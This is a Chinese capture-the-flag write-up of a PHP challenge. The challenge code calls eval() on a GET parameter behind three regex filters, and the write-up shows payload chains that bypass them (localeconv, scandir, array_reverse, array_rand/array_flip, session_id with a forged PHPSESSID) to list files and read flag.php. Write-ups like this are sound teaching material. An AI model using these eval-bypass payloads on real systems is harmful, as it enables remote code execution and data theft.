禁止套娃
扫到.git
<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
// echo $_GET['exp'];
@eval($_GET['exp']);
}
else{
die("还差一点哦!");
}
}
else{
die("再好好想想!");
}
}
else{
die("还想读flag,臭弟弟!");
}
}
// highlight_file(__FILE__);
?>
大概三层过滤,第一层过滤一些PHP伪协议,第二层过滤了有参数函数、第三层过滤 了一些关键词。
一步步来,首先我们想构造的是这样的一句话:
<?php
print_r(scandir('.'));
?>
其中
scandir('.')
可以遍历当前目录,返回当前目录的目录。但是这个函数是个有参函数,咋整呢,需要构造这个
.
利用
localeconv()
,该函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是.
/?exp=print_r(localeconv());

而
pos()
current()
两个函数可以返回数组的单元,默认取第一个值,这样就可以构造遍历目录了。exp=print_r(localeconv());
可以看到目录下是有flag文件的,在倒数第二个位置,正数第四个位置。接下来就是读取文件内容了。
这里有三种读取文件的方法
1.array_reverse()
数组逆向,加一位移位
print_r(next(array_reverse(scandir(pos(localeconv())))));
读取文件有两种方法,一种是直接
print_r(readfile(file))
,一种是highlight_file(file)

2.array_rand(array_flip())
array_rand()随机取出数组单元,array_flip()函数交换键与值
print_r(array_rand(array_flip(scandir(current(localeconv())))));
3.session_id(session_start())
print_r(session_id(session_start()));
PHPSESSID=flag.php即可。
Last modified 8mo ago